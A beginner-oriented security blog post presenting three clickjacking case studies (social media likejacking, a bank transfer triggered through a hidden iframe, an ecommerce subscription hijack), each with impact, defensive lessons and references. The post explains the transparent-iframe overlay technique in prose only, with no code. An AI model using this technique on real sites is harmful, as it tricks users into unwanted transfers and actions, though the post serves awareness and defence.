Skip to main content

Hidden Clicks, Real Damage: Clickjacking Case Studies

 


Case Study 1: Social Media LikeJacking Scam

Background

A popular social media platform saw a sudden increase in suspicious “Likes” on random pages. Users complained that they never clicked “Like,” yet their profile was promoting unknown pages.

What Happened

Attackers created a website offering “Watch Free Movies.”
A big orange Play button appeared on the page.
But behind that button, a hidden Facebook Like button was placed using a transparent iframe.

When users clicked Play → they unknowingly liked a spam page.

Impact

  • Thousands of users unknowingly boosted fake pages

  • The spam pages gained followers quickly

  • Those pages later spread phishing and scam links

Lesson

Simple UI manipulation can trick even experienced users. Social media platforms must ensure critical actions (like, share, follow) cannot be executed inside frames.

Case Study 2: Online Banking Clickjacking Fraud

Background

A regional bank noticed several customers reporting unauthorized fund transfers. Yet, no malware was found on their devices.

What Happened

Attackers sent phishing emails leading users to a fake “Account Verification” site.
This site displayed a normal verification button.
Underneath it, a transparent iframe was loaded containing the bank’s real “Transfer Funds” page—with the transfer amount and recipient pre-filled.

When users clicked “Verify,” they actually clicked the “Confirm Transfer” button inside the hidden frame.

Impact

  • Money was transferred to attacker-controlled accounts

  • Victims believed it was a bank error

  • The bank had to reimburse customers and upgrade its security

Lesson

Banks must enforce X-Frame-Options: DENY and CSP frame-ancestors 'none'; to prevent their pages from being embedded anywhere.

Case Study 3: Ecommerce Subscription Hijack

Background

A major ecommerce store received customer complaints about being subscribed to paid monthly services without their consent.

What Happened

A discount coupon website placed a hidden iframe over a fake “Get 80% Off Coupon” button.
That iframe contained the ecommerce website’s Subscribe button for a paid service.

When visitors clicked the coupon button → the click triggered the hidden subscribe action.

Impact

  • Hundreds of users accidentally subscribed

  • Customers demanded refunds

  • The ecommerce site suffered reputation damage

Lesson

Websites with financial or subscription actions should never allow their pages to be framed by external domains. Proper security headers prevent this entire attack.


References for Case Study 1: Social Media LikeJacking Scam

  1. OWASP Foundation – Clickjacking & Likejacking Attacks
    https://owasp.org/www-community/attacks/Clickjacking

  2. Facebook Security Notes – Protection Against Likejacking
    https://www.facebook.com/security

  3. Kaspersky – Social Media Scams and Clickjacking Techniques
    https://www.kaspersky.com/resource-center/threats

References for Case Study 2: Online Banking Clickjacking Fraud

  1. PortSwigger Web Security Academy – Clickjacking and UI Redressing Attacks
    https://portswigger.net/web-security/clickjacking

  2. CISA – Banking and Financial Sector Cybersecurity Threats
    https://www.cisa.gov/news-events

  3. Imperva – How Clickjacking Is Used in Financial Fraud
    https://www.imperva.com/learn/application-security/clickjacking/

References for Case Study 3: Ecommerce Subscription Hijack

  1. OWASP – Clickjacking Defense Cheat Sheet (E-commerce Risks)
    https://owasp.org/www-community/attacks/Clickjacking

  2. Venafi Security Blog – How Clickjacking Impacts Online Stores
    https://www.venafi.com/blog

  3. Norton Security – Online Shopping Risks and Hidden UI Attacks
    https://us.norton.com/internetsecurity

Comments

Post a Comment

Popular posts from this blog

How to Protect Yourself and Your Website from Clickjacking

 The good news is that clickjacking can be prevented — both by users and website owners. Here’s what you can do. If You’re a Website Owner 1. Add X-Frame-Options This tells browsers whether your site is allowed to be loaded inside an iframe. Using: DENY → no site can embed yours. SAMEORIGIN → only your own domain can embed your pages. 2. Use a Stronger CSP Rule Content Security Policy lets you decide who can load your site in a frame: Content -Security-Policy: frame-ancestors 'self' ; 3. Avoid Putting Sensitive Actions in Frames If a button performs an important function (payment, settings, etc.), keep it outside iframes. If You’re a Regular User Don’t trust shady download/play buttons. Keep your browser updated. Use an ad-blocker or iframe-blocking extension. Don’t click random links from unknown sites. Final Thoughts Clickjacking works because it targets people , not systems. The best defense is awareness — knowing how the trick works mak...
Post a Comment
Read more

Welcome to My Blog

 Hi! Thanks for stopping by. This blog is all about clickjacking —a sneaky type of attack that most people don’t even know is happening while they browse the internet. I created this space because I wanted to explain this topic in a simple and easy way, without using heavy technical words or confusing explanations. Here, I’ll be sharing what clickjacking is, how it actually works, real examples you might have seen online, and how you can protect yourself from it. Everything is written from a normal person’s point of view, so you can understand it even if you’re completely new to cybersecurity. Feel free to explore the posts, learn at your own pace, and hopefully become a bit more aware of what’s going on behind the clicks you make every day.
Post a Comment
Read more